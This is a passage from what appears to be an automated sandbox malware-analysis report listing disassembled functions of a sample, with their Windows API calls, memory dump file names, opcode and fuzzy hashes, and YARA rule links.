                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                      • String ID: CreateThread failed
                                                                      • API String ID: 2706921342-3849766595
                                                                      • Opcode ID: 3e7f103d618ee1556ca885834cdba836b83791945ab318f1c34aab253840b3b9
                                                                      • Instruction ID: f85cce6f920c3ea9b83213ae65670116a7396a624510f1d9aa243991e1ec9966
                                                                      • Opcode Fuzzy Hash: 3e7f103d618ee1556ca885834cdba836b83791945ab318f1c34aab253840b3b9
                                                                      • Instruction Fuzzy Hash: E101D6B5344309BBD7306E64AC95F7673A9FB41761F20402FF686923C0CEA968848624
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: 2}$PDGu<}
                                                                      • API String ID: 1269201914-2906391703
                                                                      • Opcode ID: 7766f5be54cd7149d3dfa96c6df62a671848c5f43c10d1fab6e2f265d3f7390e
                                                                      • Instruction ID: dd96a80c4ad2313780bb53e7d0b859af1c599052153d79bda23857b4f6df8061
                                                                      • Opcode Fuzzy Hash: 7766f5be54cd7149d3dfa96c6df62a671848c5f43c10d1fab6e2f265d3f7390e
                                                                      • Instruction Fuzzy Hash: BDB012C125C545FD310671483D06D3F117CD0C1F10330512FF505CC380E84C0C442431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: (}$PDGu<}
                                                                      • API String ID: 1269201914-2387732174
                                                                      • Opcode ID: a8835b158a3d306ae8618f1a72507ec5dab072fcfc2fa25b54a9d85922ebf2b5
                                                                      • Instruction ID: bd04fbc9fe2f017865dcd34f0a5091bea5f9d755ae8f42050b5b92f34afe0a1b
                                                                      • Opcode Fuzzy Hash: a8835b158a3d306ae8618f1a72507ec5dab072fcfc2fa25b54a9d85922ebf2b5
                                                                      • Instruction Fuzzy Hash: C1B092C1258585AC210661482E06C3A1568C081B10320902FB605C8280A8480C452431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,?,007CD343,00000001,?,?,?,00000000,007D551D,?,?,?), ref: 007C9F9E
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,007D551D,?,?,?,?,?,007D4FC7,?), ref: 007C9FE5
                                                                      • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,007CD343,00000001,?,?), ref: 007CA011
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$Handle
                                                                      • String ID:
                                                                      • API String ID: 4209713984-0
                                                                      • Opcode ID: 6dc93266e42cab7395835b33ab50bae279048d36392e816ab187f253811f8a9b
                                                                      • Instruction ID: a8db24e9e05c76cd203ab0d28b3d1947ab5f62d68846428f144337856c9f9ae0
                                                                      • Opcode Fuzzy Hash: 6dc93266e42cab7395835b33ab50bae279048d36392e816ab187f253811f8a9b
                                                                      • Instruction Fuzzy Hash: D0319131208309AFEB14CF20D858F6E77A5FF85755F04491DF98197290DB79AD88CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007CC27E: _wcslen.LIBCMT ref: 007CC284
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA2D9
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA30C
                                                                      • GetLastError.KERNEL32(?,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA329
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$ErrorLast_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2260680371-0
                                                                      • Opcode ID: c05eb6f103e843049b7d1758370a220a8f35c39f471310c28d0c04c0a17ff9a8
                                                                      • Instruction ID: 853fe1f7664bfff1010eb814a47440313b9facb48b8f680b3ca53b6fe10467c2
                                                                      • Opcode Fuzzy Hash: c05eb6f103e843049b7d1758370a220a8f35c39f471310c28d0c04c0a17ff9a8
                                                                      • Instruction Fuzzy Hash: CD01D871600268BAEF21ABB54C59FFD3758AF0978BF04441DF901D6181DB5CCA81C7B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007EB8B8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      • Opcode ID: 8267be487db12e9b88db3f5950f54536335810a14d9bae3235651e7d417db2be
                                                                      • Instruction ID: f32d506cf74a3b4a990c8b413323d5556c8a0c28afaf1343804db2d653b3e3b2
                                                                      • Opcode Fuzzy Hash: 8267be487db12e9b88db3f5950f54536335810a14d9bae3235651e7d417db2be
                                                                      • Instruction Fuzzy Hash: FD41E7B05052CC9ADF218E6A8C84BF7BFA9DB59304F1404EDE5DA86143D339AA45DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 007EAFDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: String
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 2568140703-3893581201
                                                                      • Opcode ID: fbe7371312e0b86f5fc3779961ff447e312a3053dbbbd60eb0997d07aaf7eb8d
                                                                      • Instruction ID: 367648cee01aeae244ec5cc85357a65893baf3ff0ff7c4675936fd582b4b2c9a
                                                                      • Opcode Fuzzy Hash: fbe7371312e0b86f5fc3779961ff447e312a3053dbbbd60eb0997d07aaf7eb8d
                                                                      • Instruction Fuzzy Hash: D601137250520EBBCF02AF91DC06DAE7F62EB0C750F018155FE1466260CA7ADA31EB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007EA56F), ref: 007EAF55
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                      • String ID: InitializeCriticalSectionEx
                                                                      • API String ID: 2593887523-3084827643
                                                                      • Opcode ID: b23e54318e27d2d2c75611d134771f1c904cd10e7b81a93a5d8d1264eeb8218c
                                                                      • Instruction ID: 87a1e5720005b567253c243d015db3ce9f0b80e6b7beaca8f2df8cd2a64f566d
                                                                      • Opcode Fuzzy Hash: b23e54318e27d2d2c75611d134771f1c904cd10e7b81a93a5d8d1264eeb8218c
                                                                      • Instruction Fuzzy Hash: 75F0B47164620CBBCF059F65CC06CBD7F61EF08B11B008055FD0956360DA79AE20D79A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2773662609-671089009
                                                                      • Opcode ID: bee7651c0381874bce36fd61b38f258e4cb814748a53fe6fd4eaf30e3fd15a0b
                                                                      • Instruction ID: c56a1c31ad870956365a478dd0d487efa070ef8df53eca61ba1be2a597df9c98
                                                                      • Opcode Fuzzy Hash: bee7651c0381874bce36fd61b38f258e4cb814748a53fe6fd4eaf30e3fd15a0b
                                                                      • Instruction Fuzzy Hash: 37E05570B4620CBBC205EB26CC07D3EBB64DB08B21B008099F90193350CDBC6E00C2DA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: c4fdb99db39bf2ab0eb867f0953952cea85d79d703e5b1d236a9ea4e124ad2e6
                                                                      • Instruction ID: 1b36947d0cdba5bd9fa7a700bf1bea62809b46e7433514e99dc2860bb67d84e6
                                                                      • Opcode Fuzzy Hash: c4fdb99db39bf2ab0eb867f0953952cea85d79d703e5b1d236a9ea4e124ad2e6
                                                                      • Instruction Fuzzy Hash: 65B012D1358048ED310672452D06C37012CC0C1B20330C03FFD05C9380D84CAC581432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 3795c6555b266c34a50153ce836cfeefb61d6148457ea62d1a1980bb5fe4e942
                                                                      • Instruction ID: 728882e392f387385ffc66f228665962648dd56c25f96c01cf8d5f7695526ba2
                                                                      • Opcode Fuzzy Hash: 3795c6555b266c34a50153ce836cfeefb61d6148457ea62d1a1980bb5fe4e942
                                                                      • Instruction Fuzzy Hash: 33B012D535C14CEC310771892D06C37012CD0C0B20330403FF905C9380D84C6D541932
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 305cbaf65faf6627cb160320f11bbfbac25fdde0641a891ded4349085167ed29
                                                                      • Instruction ID: 880bdd172a2ac9a42e3587eefaae517437b59f176e03e1ca6f797bc27efc4dc0
                                                                      • Opcode Fuzzy Hash: 305cbaf65faf6627cb160320f11bbfbac25fdde0641a891ded4349085167ed29
                                                                      • Instruction Fuzzy Hash: 51B012D5358148FC310731852D16C37012CC0C1B20330843FFD01C8680D84CAD541832
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 48c8f40119cb90dfc849378898293dacc7e5e9f112a59f2ac062a3fa8a684f76
                                                                      • Instruction ID: 8d792a86190fc5aec887c605b374e88f7ae65d532d2e351293c12151d0eaa162
                                                                      • Opcode Fuzzy Hash: 48c8f40119cb90dfc849378898293dacc7e5e9f112a59f2ac062a3fa8a684f76
                                                                      • Instruction Fuzzy Hash: 2AB012D1358058EC310671552D06C37016CC0C1B20330803FFE05C9380E84CAC541432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 8249dc669e60c2d360809d86d685a8e0428e370ad81bb99036cd0ce872fea104
                                                                      • Instruction ID: cc3215c258d43a5c5151a158ffdf40cefa72259f23133c17846097618f6b0940
                                                                      • Opcode Fuzzy Hash: 8249dc669e60c2d360809d86d685a8e0428e370ad81bb99036cd0ce872fea104
                                                                      • Instruction Fuzzy Hash: E7B012D1369088EC310671452D06C37016DD4C0B20330403FF906C9380D84CAC541432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
